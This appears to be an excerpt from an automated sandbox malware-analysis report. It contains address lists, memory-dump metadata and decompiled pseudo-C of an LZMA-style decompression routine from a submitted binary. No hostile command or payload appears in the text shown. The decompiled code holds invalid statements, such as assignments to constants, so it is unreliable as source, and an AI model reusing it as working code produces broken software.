0x00406d1e
0x00406d21
0x00406d24
0x00406d2e
0x00406fc2
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x00406fc2
0x00406d19
0x00000000
0x00000000
0x00406d3a
0x00406d3e
0x00406d45
0x00406d48
0x00406d4b
0x00406d40
0x00406d40
0x00406d40
0x00406d4e
0x00406d51
0x00406d54
0x00406d54
0x00406d57
0x00406d5a
0x00406d5d
0x00406d5d
0x00406d60
0x00406d67
0x00406d6c
0x00000000
0x00000000
0x00406dfa
0x00406dfa
0x00406dfe
0x0040719c
0x00000000
0x0040719c
0x00406e04
0x00406e07
0x00406e0a
0x00406e0e
0x00406e11
0x00406e17
0x00406e19
0x00406e19
0x00406e19
0x00406e1c
0x00406e1f
0x00000000
0x00000000
0x004069ef
0x004069ef
0x004069f3
0x00407160
0x00000000
0x00407160
0x004069f9
0x004069fc
0x004069ff
0x00406a03
0x00406a06
0x00406a0c
0x00406a0e
0x00406a0e
0x00406a0e
0x00406a11
0x00406a14
0x00406a14
0x00406a17
0x00406a1a
0x00000000
0x00000000
0x00406a20
0x00406a26
0x00000000
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x00406a33
0x00406a36
0x00406a39
0x00406a3c
0x00406a3d
0x00406a40
0x00406a42
0x00406a48
0x00406a4b
0x00406a4e
0x00406a51
0x00406a54
0x00406a57
0x00406a5a
0x00406a76
0x00406a79
0x00406a7c
0x00406a7f
0x00406a86
0x00406a8a
0x00406a8c
0x00406a90
0x00406a5c
0x00406a5c
0x00406a60
0x00406a68
0x00406a6d
0x00406a6f
0x00406a71
0x00406a71
0x00406a93
0x00406a9a
0x00406a9d
0x00000000
0x00406aa3
0x00000000
0x00406aa3
0x00000000
0x00406aa8
0x00406aa8
0x00406aac
0x0040716c
0x00000000
0x0040716c
0x00406ab2
0x00406ab5
0x00406ab8
0x00406abc
0x00406abf
0x00406ac5
0x00406ac7
0x00406ac7
0x00406ac7
0x00406aca
0x00406acd
0x00406acd
0x00406acd
0x00406ad3
0x00000000
0x00000000
0x00406ad5
0x00406ad8
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae7
0x00406aea
0x00406aed
0x00406af0
0x00406af3
0x00406b0b
0x00406b0e
0x00406b11
0x00406b14
0x00406b14
0x00406b17
0x00406b1b
0x00406b1d
0x00406af5
0x00406af5
0x00406afd
0x00406b02
0x00406b04
0x00406b06
0x00406b06
0x00406b20
0x00406b27
0x00406b2a
0x00000000
0x00406b2c
0x00000000
0x00406b2c
0x00406b2a
0x00406b31
0x00406b31
0x00406b31
0x00406b31
0x00000000
0x00000000
0x00406b6c
0x00406b6c
0x00406b70
0x00407178
0x00000000
0x00407178
0x00406b76
0x00406b79
0x00406b7c
0x00406b80
0x00406b83
0x00406b89
0x00406b8b
0x00406b8b
0x00406b8b
0x00406b8e
0x00406b91
0x00406b91
0x00406b97
0x00406b35
0x00406b35
0x00406b38
0x00000000
0x00406b38
0x00406b99
0x00406b99
0x00406b9c
0x00406b9f
0x00406ba2
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb7
0x00406bcf
0x00406bd2
0x00406bd5
0x00406bd8
0x00406bd8
0x00406bdb
0x00406bdf
0x00406be1
0x00406bb9
0x00406bb9
0x00406bc1
0x00406bc6
0x00406bc8
0x00406bca
0x00406bca
0x00406be4
0x00406beb
0x00406bee
0x00000000
0x00406bf0
0x00000000
0x00406bf0
0x00000000
0x00406e7d
0x00406e7d
0x00406e81
0x004071a8
0x00000000
0x004071a8
0x00406e87
0x00406e8a
0x00406e8d
0x00406e91
0x00406e94
0x00406e9a
0x00406e9c
0x00406e9c
0x00406e9c
0x00406e9f
0x00000000
0x00000000
0x00406c4d
0x00406c4d
0x00406c50
0x00406fc2
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x00000000
0x00406f8c
0x00406f90
0x00406fb2
0x00406fb5
0x00406fbf
0x00406fc2
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x00406fc2
0x00406f92
0x00406f95
0x00406f99
0x00406f9c
0x00406f9c
0x00406f9f
0x00000000
0x00000000
0x00407049
0x0040704d
0x0040706b
0x0040706b
0x0040706b
0x00407072
0x00407079
0x00407080
0x00407080
0x00000000
0x00407080
0x0040704f
0x00407052
0x00407055
0x00407058
0x0040705f
0x00406fa3
0x00406fa3
0x00406fa6
0x00000000
0x00000000
0x0040713a
0x0040713d
0x0040703e
0x00000000
0x00000000
0x00406d74
0x00406d76
0x00406d7d
0x00406d7e
0x00406d80
0x00406d83
0x00000000
0x00000000
0x00406d8b
0x00406d8e
0x00406d91
0x00406d93
0x00406d95
0x00406d95
0x00406d96
0x00406d99
0x00406da0
0x00406da3
0x00406db1
0x00000000
0x00000000
0x00407087
0x00407087
0x0040708a
0x00407091
0x00000000
0x00000000
0x00407096
0x00407096
0x0040709a
0x004071d2
0x00000000
0x004071d2
0x004070a0
0x004070a3
0x004070a6
0x004070aa
0x004070ad
0x004070b3
0x004070b5
0x004070b5
0x004070b5
0x004070b8
0x004070bb
0x004070bb
0x004070bb
0x004070bb
0x004070be
0x004070be
0x004070c2
0x00407122
0x00407125
0x0040712a
0x0040712b
0x0040712d
0x0040712f
0x00407132
0x0040703e
0x0040703e
0x00000000
0x00407044
0x0040703e
0x004070c4
0x004070ca
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e5
0x004070fe
0x00407101
0x00407104
0x00407107
0x0040710b
0x0040710d
0x0040710d
0x0040710e
0x00407111
0x004070e7
0x004070e7
0x004070ef
0x004070f4
0x004070f6
0x004070f9
0x004070f9
0x00407114
0x0040711b
0x00000000
0x0040711d
0x00000000
0x0040711d
0x00000000
0x00406db9
0x00406dbc
0x00406df2
0x00406f22
0x00406f22
0x00406f22
0x00406f22
0x00406f25
0x00406f25
0x00406f28
0x00406f2a
0x004071b4
0x00000000
0x004071b4
0x00406f30
0x00406f33
0x00000000
0x00000000
0x00406f39
0x00406f3d
0x00406f40
0x00406f40
0x00406f40
0x00000000
0x00406f40
0x00406dbe
0x00406dc0
0x00406dc2
0x00406dc4
0x00406dc7
0x00406dc8
0x00406dca
0x00406dcc
0x00406dcf
0x00406dd2
0x00406de8
0x00406ded
0x00406e25
0x00406e25
0x00406e29
0x00406e55
0x00406e57
0x00406e5e
0x00406e61
0x00406e64
0x00406e64
0x00406e69
0x00406e69
0x00406e6b
0x00406e6e
0x00406e75
0x00406e78
0x00406ea5
0x00406ea5
0x00406ea8
0x00406eab
0x00406f1f
0x00406f1f
0x00406f1f
0x00000000
0x00406f1f
0x00406ead
0x00406eb3
0x00406eb6
0x00406eb9
0x00406ebc
0x00406ebf
0x00406ec2
0x00406ec5
0x00406ec8
0x00406ecb
0x00406ece
0x00406ee7
0x00406ee9
0x00406eec
0x00406eed
0x00406ef0
0x00406ef2
0x00406ef5
0x00406ef7
0x00406ef9
0x00406efc
0x00406efe
0x00406f01
0x00406f05
0x00406f07
0x00406f07
0x00406f08
0x00406f0b
0x00406f0e
0x00406ed0
0x00406ed0
0x00406ed8
0x00406edd
0x00406edf
0x00406ee2
0x00406ee2
0x00406f11
0x00406f18
0x00406ea2
0x00406ea2
0x00406ea2
0x00406ea2
0x00000000
0x00406f1a
0x00000000
0x00406f1a
0x00406f18
0x00406e2b
0x00406e2e
0x00406e30
0x00406e33
0x00406e36
0x00406e39
0x00406e3b
0x00406e3e
0x00406e41
0x00406e41
0x00406e44
0x00406e44
0x00406e47
0x00406e4e
0x00406e22
0x00406e22
0x00406e22
0x00406e22
0x00000000
0x00406e50
0x00000000
0x00406e50
0x00406e4e
0x00406dd4
0x00406dd7
0x00406dd9
0x00406ddc
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407184
0x00000000
0x00407184
0x00406b45
0x00406b48
0x00406b4b
0x00406b4e
0x00406b51
0x00406b54
0x00406b57
0x00406b59
0x00406b5c
0x00406b5f
0x00406b62
0x00406b64
0x00406b64
0x00406b64
0x00000000
0x00000000
0x00406cc6
0x00406cc6
0x00406cca
0x00407190
0x00000000
0x00407190
0x00406cd0
0x00406cd3
0x00406cd6
0x00406cd9
0x00406cdb
0x00406cdb
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce7
0x00406cea
0x00406ced
0x00406cee
0x00406cf0
0x00406cf0
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cfc
0x00406cfc
0x00406cff
0x00406d01
0x00406d01
0x00000000
0x00000000
0x00406f43
0x00406f43
0x00406f43
0x00406f47
0x00000000
0x00000000
0x00406f4d
0x00406f50
0x00406f53
0x00406f56
0x00406f58
0x00406f58
0x00406f58
0x00406f5b
0x00406f5e
0x00406f61
0x00406f64
0x00406f67
0x00406f6a
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00406f70
0x00406f73
0x00406f76
0x00406f79
0x00406f7c
0x00406f80
0x00406f82
0x00406f85
0x00000000
0x00406f87
0x00406d04
0x00406d04
0x00000000
0x00406d04
0x00406f85
0x004071ba
0x00000000
0x00000000
0x004067e9
0x004071f1
0x004071f1
0x00000000
0x004071f1
0x0040703e
0x00406fc5
0x00406fc2
0x00000000
0x00406bf9

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406D13 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406D13() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004071F9))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4)); // executed
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
